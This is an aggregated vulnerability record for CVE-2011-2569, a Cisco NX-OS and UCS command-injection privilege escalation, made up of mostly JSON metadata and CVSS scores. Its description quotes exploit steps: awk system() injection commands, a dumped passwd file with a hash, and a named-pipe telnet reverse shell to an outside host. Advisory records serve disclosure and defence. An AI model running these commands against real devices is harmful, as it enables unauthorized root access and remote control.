cvelistv5 - cve-2011-2569

CVE-2011-2569 (GCVE-0-2011-2569)

Vulnerability from cvelistv5 – Published: 2011-10-27 21:00 – Updated: 2024-09-17 02:51

Summary

Severity ?

No CVSS data available.

CWE

Assigner

cisco

References

URL

GSD-2011-2569

Vulnerability from gsd - Updated: 2023-12-13 01:19

Details

Aliases

CVE-2011-2569

Aliases

CVE-2011-2569

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2011-2569",
    "description": "Cisco Nexus OS (aka NX-OS) 4.2 and 5.0 and Cisco Unified Computing System with software 1.4 and 2.0 do not properly restrict command-line options, which allows local users to gain privileges via unspecified vectors, aka Bug IDs CSCtf40008, CSCtg18363, CSCtr44645, CSCts10195, and CSCts10188.",
    "id": "GSD-2011-2569",
    "references": [
      "https://packetstormsecurity.com/files/cve/CVE-2011-2569"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2011-2569"
      ],
      "details": "Cisco Nexus OS (aka NX-OS) 4.2 and 5.0 and Cisco Unified Computing System with software 1.4 and 2.0 do not properly restrict command-line options, which allows local users to gain privileges via unspecified vectors, aka Bug IDs CSCtf40008, CSCtg18363, CSCtr44645, CSCts10195, and CSCts10188.",
      "id": "GSD-2011-2569",
      "modified": "2023-12-13T01:19:06.500786Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "psirt@cisco.com",
        "ID": "CVE-2011-2569",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "n/a",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "n/a"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "n/a"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "Cisco Nexus OS (aka NX-OS) 4.2 and 5.0 and Cisco Unified Computing System with software 1.4 and 2.0 do not properly restrict command-line options, which allows local users to gain privileges via unspecified vectors, aka Bug IDs CSCtf40008, CSCtg18363, CSCtr44645, CSCts10195, and CSCts10188."
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "n/a"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "http://tools.cisco.com/security/center/viewAlert.x?alertId=24458",
            "refsource": "CONFIRM",
            "url": "http://tools.cisco.com/security/center/viewAlert.x?alertId=24458"
          }
        ]
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:cisco:nx-os:4.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:nx-os:5.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:unified_computing_system:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:unified_computing_system_infrastructure_and_unified_computing_system_software:2.0\\(1q\\):*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:unified_computing_system_infrastructure_and_unified_computing_system_software:1.4\\(1j\\):*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "psirt@cisco.com",
          "ID": "CVE-2011-2569"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "Cisco Nexus OS (aka NX-OS) 4.2 and 5.0 and Cisco Unified Computing System with software 1.4 and 2.0 do not properly restrict command-line options, which allows local users to gain privileges via unspecified vectors, aka Bug IDs CSCtf40008, CSCtg18363, CSCtr44645, CSCts10195, and CSCts10188."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-264"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://tools.cisco.com/security/center/viewAlert.x?alertId=24458",
              "refsource": "CONFIRM",
              "tags": [
                "Vendor Advisory"
              ],
              "url": "http://tools.cisco.com/security/center/viewAlert.x?alertId=24458"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "cvssV2": {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "SINGLE",
            "availabilityImpact": "COMPLETE",
            "baseScore": 6.8,
            "confidentialityImpact": "COMPLETE",
            "integrityImpact": "COMPLETE",
            "vectorString": "AV:L/AC:L/Au:S/C:C/I:C/A:C",
            "version": "2.0"
          },
          "exploitabilityScore": 3.1,
          "impactScore": 10.0,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "MEDIUM",
          "userInteractionRequired": false
        }
      },
      "lastModifiedDate": "2018-10-30T16:26Z",
      "publishedDate": "2011-10-27T21:55Z"
    }
  }
}

VAR-201110-0195

Vulnerability from variot - Updated: 2023-12-18 13:57

Cisco Nexus OS (aka NX-OS) 4.2 and 5.0 and Cisco Unified Computing System with software 1.4 and 2.0 do not properly restrict command-line options, which allows local users to gain privileges via unspecified vectors, aka Bug IDs CSCtf40008, CSCtg18363, CSCtr44645, CSCts10195, and CSCts10188. The problem is Bug ID CSCtf40008 , CSCtg18363 , CSCtr44645 , CSCts10195 ,and CSCts10188 It is a problem.Authority may be obtained by local users. The Cisco Nexus Series switches are data center switches. Adopt the Cisco Nexus OS operating system. The section command is used as an AWK script to pass the request string, but the input is not fully filtered. Any command can be executed on the LINUX subsystem. nx1# sh clock | sed 's/./BEGIN \{ system$\\"id \"$ \}/' > 20110713.awk Warning: There is already a file existing with this name. Do you want to overwrite (yes/no)? [no] y nx1# sh clock | sec ' -f /bootflash /20110713.awk ' uid=2003(user) gid=504(network-operator) 11:16:04.082 UTC Wed Jul 13 2011 nx1# sh clock | sed 's/./BEGIN \{ system$\\"ls \/mnt\/cfg\/0\/\"$ \}/' > 20110713.awk nx1# sh clock | sec ' -f /bootflash/20110713.awk ' ascii bin boot cfglabel.sysmgr debug licenses linux log lost +found 11:18:41.885 UTC Wed Jul 13 2011 can be used to delete any file in the boot flash or send the 'reboot' command. In addition, the less command Han total, press the colon and press the \"e\" key to specify the file path to be opened. You can view any system file: bin::1:1:bin:/bin: daemon::2:2:daemon :/usr/sbin: sys::3:3:sys:/dev: ftp::15:14:ftp:/var/ftp:/isanboot/bin/nobash ftpuser:UvdRSOzORvz9o:99:14:ftpuser: /var/ftp:/isanboot/bin/nobash nobody:*:65534:65534:nobody:/home:/bin/sh admin:x:2002:503::/var/home/admin:/isan/bin/vsh_perm Use \"|\" (pipe) and then press the \"$\" macro key to execute the command: !ls -lah > /bootflash/20110715 You can also create a remote shell by doing the following: mknod rs p; telnet ad.dr.es. s 8888 0rs. A local attacker can exploit these issues to execute arbitrary commands with administrative privileges. Successful exploits may compromise the affected computer. Cisco MDS, UCS, Nexus 7000, 5000, 4000, 3000, 2000, and 1000V are vulnerable; other versions may also be affected

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201110-0195",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "unified computing system 1.4",
        "scope": null,
        "trust": 2.4,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "nx-os",
        "scope": "eq",
        "trust": 1.9,
        "vendor": "cisco",
        "version": "5.0"
      },
      {
        "model": "nx-os",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "cisco",
        "version": "4.2"
      },
      {
        "model": "unified computing system",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "unified computing system infrastructure and unified computing system software",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "2.0\\(1q\\)"
      },
      {
        "model": "unified computing system infrastructure and unified computing system software",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "1.4\\(1j\\)"
      },
      {
        "model": "nx-os",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cisco",
        "version": "4.2 and  5.0"
      },
      {
        "model": "unified computing system",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cisco",
        "version": "with software 1.4 and  2.0"
      },
      {
        "model": "ucs",
        "scope": null,
        "trust": 0.6,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "mds",
        "scope": null,
        "trust": 0.6,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "1000v"
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "2000"
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "3000"
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "4000"
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "5000"
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "7000"
      },
      {
        "model": "unified computing system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.0"
      },
      {
        "model": "unified computing system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "nx-os 5.0 u1",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "nx-os 5.0 n2",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "nx-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.0(3)"
      },
      {
        "model": "nx-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.0(2)"
      },
      {
        "model": "nx-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.0(0.54)"
      },
      {
        "model": "nx-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.2.1"
      },
      {
        "model": "nx-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.2(5)"
      },
      {
        "model": "nx-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.2(4)"
      },
      {
        "model": "nx-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.2(3)"
      },
      {
        "model": "nx-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.2(2)"
      },
      {
        "model": "nx-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.1(4)"
      },
      {
        "model": "nx-os 4.1 n2",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "nx-os 4.0 n2",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "nx-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "70000"
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "50000"
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "40000"
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "30000"
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "20000"
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1000v0"
      },
      {
        "model": "mds",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "9000"
      },
      {
        "model": "mds",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "unified computing system 2.0",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "nx-os",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.2(1)"
      },
      {
        "model": "nx-os 5.1 n1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "nx-os",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.1(1)"
      },
      {
        "model": "nx-os 5.0 u2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "nx-os",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.2(6)"
      },
      {
        "model": "nx-os 4.2 sv1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "nx-os 4.2 n2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "nx-os 4.1 n2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2011-4420"
      },
      {
        "db": "BID",
        "id": "50347"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-002700"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-2569"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201110-586"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:cisco:nx-os:4.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:nx-os:5.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:unified_computing_system:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:unified_computing_system_infrastructure_and_unified_computing_system_software:2.0\\(1q\\):*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:unified_computing_system_infrastructure_and_unified_computing_system_software:1.4\\(1j\\):*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2011-2569"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Peter Adkins",
    "sources": [
      {
        "db": "BID",
        "id": "50347"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201110-586"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2011-2569",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "SINGLE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 6.8,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.1,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:S/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Local",
            "authentication": "Single",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 6.8,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2011-2569",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:S/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "SINGLE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 6.8,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.1,
            "id": "VHN-50514",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:L/AC:L/AU:S/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2011-2569",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201110-586",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-50514",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-50514"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-002700"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-2569"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201110-586"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Cisco Nexus OS (aka NX-OS) 4.2 and 5.0 and Cisco Unified Computing System with software 1.4 and 2.0 do not properly restrict command-line options, which allows local users to gain privileges via unspecified vectors, aka Bug IDs CSCtf40008, CSCtg18363, CSCtr44645, CSCts10195, and CSCts10188. The problem is Bug ID CSCtf40008 , CSCtg18363 , CSCtr44645 , CSCts10195 ,and CSCts10188 It is a problem.Authority may be obtained by local users. The Cisco Nexus Series switches are data center switches. Adopt the Cisco Nexus OS operating system. The section command is used as an AWK script to pass the request string, but the input is not fully filtered. Any command can be executed on the LINUX subsystem. nx1# sh clock | sed \u0027s/.*/BEGIN \\\\{ system\\\\(\\\\\\\"id \\\"\\\\) \\\\}/\u0027 \u003e 20110713.awk Warning: There is already a file existing with this name. Do you want to overwrite (yes/no)? [no] y nx1# sh clock | sec \u0027* -f /bootflash /20110713.awk \u0027 uid=2003(user) gid=504(network-operator) 11:16:04.082 UTC Wed Jul 13 2011 nx1# sh clock | sed \u0027s/.*/BEGIN \\\\{ system\\\\(\\\\\\\"ls \\\\/mnt\\\\/cfg\\\\/0\\\\/\\\"\\\\) \\\\}/\u0027 \u003e 20110713.awk nx1# sh clock | sec \u0027* -f /bootflash/20110713.awk \u0027 ascii bin boot cfglabel.sysmgr debug licenses linux log lost +found 11:18:41.885 UTC Wed Jul 13 2011 can be used to delete any file in the boot flash or send the \u0027reboot\u0027 command. In addition, the less command Han total, press the colon and press the \\\"e\\\" key to specify the file path to be opened. You can view any system file: bin:*:1:1:bin:/bin: daemon:*:2:2:daemon :/usr/sbin: sys:*:3:3:sys:/dev: ftp:*:15:14:ftp:/var/ftp:/isanboot/bin/nobash ftpuser:UvdRSOzORvz9o:99:14:ftpuser: /var/ftp:/isanboot/bin/nobash nobody:*:65534:65534:nobody:/home:/bin/sh admin:x:2002:503::/var/home/admin:/isan/bin/vsh_perm Use \\\"|\\\" (pipe) and then press the \\\"$\\\" macro key to execute the command: !ls -lah \u003e /bootflash/20110715 You can also create a remote shell by doing the following: mknod rs p; telnet ad.dr.es. s 8888 0\u003crs | /bin/bash 1\u003ers. \nA local attacker can exploit these issues to execute arbitrary commands with administrative privileges. Successful exploits may compromise the affected computer. \nCisco MDS, UCS, Nexus 7000, 5000, 4000, 3000, 2000, and 1000V are vulnerable; other versions may also be affected",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2011-2569"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-002700"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4420"
      },
      {
        "db": "BID",
        "id": "50347"
      },
      {
        "db": "VULHUB",
        "id": "VHN-50514"
      }
    ],
    "trust": 2.52
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-50514",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-50514"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2011-2569",
        "trust": 3.4
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-002700",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201110-586",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-4420",
        "trust": 0.6
      },
      {
        "db": "NSFOCUS",
        "id": "18029",
        "trust": 0.6
      },
      {
        "db": "BID",
        "id": "50347",
        "trust": 0.4
      },
      {
        "db": "PACKETSTORM",
        "id": "106171",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-50514",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2011-4420"
      },
      {
        "db": "VULHUB",
        "id": "VHN-50514"
      },
      {
        "db": "BID",
        "id": "50347"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-002700"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-2569"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201110-586"
      }
    ]
  },
  "id": "VAR-201110-0195",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2011-4420"
      },
      {
        "db": "VULHUB",
        "id": "VHN-50514"
      }
    ],
    "trust": 1.3225354249999999
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2011-4420"
      }
    ]
  },
  "last_update_date": "2023-12-18T13:57:55.869000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "24458",
        "trust": 0.8,
        "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=24458"
      },
      {
        "title": "Cisco Nexus OS \u0027section\u0027 and \u0027less\u0027 local command injection vulnerability patches",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/5588"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2011-4420"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-002700"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-264",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-50514"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-002700"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-2569"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.0,
        "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=24458"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2569"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-2569"
      },
      {
        "trust": 0.6,
        "url": "http://www.securityfocus.com/archive/1/520193"
      },
      {
        "trust": 0.6,
        "url": "http://www.nsfocus.net/vulndb/18029"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/520193"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/520290"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2011-4420"
      },
      {
        "db": "VULHUB",
        "id": "VHN-50514"
      },
      {
        "db": "BID",
        "id": "50347"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-002700"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-2569"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201110-586"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
